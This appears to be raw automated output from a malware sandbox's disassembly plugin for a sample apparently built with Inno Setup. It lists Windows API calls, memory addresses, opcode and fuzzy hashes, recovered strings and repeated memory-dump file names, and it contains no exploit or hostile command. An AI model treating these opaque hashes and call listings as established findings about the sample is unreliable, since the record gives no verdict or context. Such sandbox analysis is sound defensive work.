                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                                    • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                                    • Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                                    • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                                    • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                    • Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                                    • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                    APIs
                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                    • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                    • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                    • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                      • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 734332943-0
                                                                                    • Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                                    • Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
                                                                                    • Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                                    • Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                    • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                                    • Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                    • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                    • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                    • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                    • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                    • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                                    • Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                    • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                    • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                                    • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                    • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1452528299-0
                                                                                    • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                    • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                                    • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                    • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1263568516-0
                                                                                    • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                    • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                                    • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                    • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                    • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                    • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                      • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoadVersion
                                                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                    • API String ID: 1968650500-2910565190
                                                                                    • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                    • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                                    • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                    • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00457D4F
                                                                                    • QueryPerformanceCounter.KERNEL32(02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D58
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(02193858,02193858), ref: 00457D62
                                                                                    • GetCurrentProcessId.KERNEL32(?,02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D6B
                                                                                    • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02193858,02193858), ref: 00457DEF
                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                                    • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                    • API String ID: 770386003-3271284199
                                                                                    • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                    • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                                    • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                    • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
                                                                                    APIs
                                                                                      • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                      • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                      • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                      • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
                                                                                      • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                      • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02192BDC,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                                    • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                                    • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
